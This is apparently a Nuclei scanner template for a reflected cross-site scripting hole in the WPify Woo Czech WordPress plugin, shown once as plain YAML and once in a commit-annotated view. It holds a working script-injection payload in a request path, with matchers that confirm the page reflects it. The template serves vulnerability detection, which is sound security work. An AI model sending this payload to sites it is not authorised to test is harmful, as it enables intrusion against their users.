nuclei-templates/vulnerabilities/wordpress/wpify-woo-czech-xss.yaml

id: wpify-woo-czech-xss

info:
  name: WPify Woo Czech < 3.5.7 - Reflected Cross-Site Scripting (XSS)
  author: Akincibor
  severity: medium
  description: The plugin uses the Vies library v2.2.0, which has a sample file outputting $_SERVER['PHP_SELF'] in an attribute without being escaped first, leading to a Reflected Cross-Site Scripting. The issue is only exploitable when the web server has the PDO driver installed, and write access to the example directory (otherwise an exception will be raised before the payload is output)..
  reference:
    - https://wpscan.com/vulnerability/5c66c32b-22f2-4b59-a6b2-b8da944cdc3c
  metadata:
    verified: true
  tags: wp,wordpress,xss,wp-plugin,wpify,wpscan

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/wpify-woo/deps/dragonbe/vies/examples/async_processing/queue.php/"><script>alert(document.domain)</script>'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"><script>alert(document.domain)</script>'
          - 'Add a new VAT ID to the queue'
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
Create wpify-woo-czech-xss.yaml 2022-06-28 02:30:31 +00:00			`id: wpify-woo-czech-xss`

			`info:`
			`name: WPify Woo Czech < 3.5.7 - Reflected Cross-Site Scripting (XSS)`
			`author: Akincibor`
			`severity: medium`
			`description: The plugin uses the Vies library v2.2.0, which has a sample file outputting $_SERVER['PHP_SELF'] in an attribute without being escaped first, leading to a Reflected Cross-Site Scripting. The issue is only exploitable when the web server has the PDO driver installed, and write access to the example directory (otherwise an exception will be raised before the payload is output)..`
			`reference:`
			`- https://wpscan.com/vulnerability/5c66c32b-22f2-4b59-a6b2-b8da944cdc3c`
			`metadata:`
			`verified: true`
Auto Generated CVE annotations [Sat Aug 27 04:41:18 UTC 2022] :robot: 2022-08-27 04:41:18 +00:00			`tags: wp,wordpress,xss,wp-plugin,wpify,wpscan`
Create wpify-woo-czech-xss.yaml 2022-06-28 02:30:31 +00:00
			`requests:`
			`- method: GET`
			`path:`
			`- '{{BaseURL}}/wp-content/plugins/wpify-woo/deps/dragonbe/vies/examples/async_processing/queue.php/"><script>alert(document.domain)</script>'`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
			`- '"><script>alert(document.domain)</script>'`
			`- 'Add a new VAT ID to the queue'`
			`condition: and`

			`- type: word`
			`part: header`
			`words:`
			`- text/html`

			`- type: status`
			`status:`
			`- 200`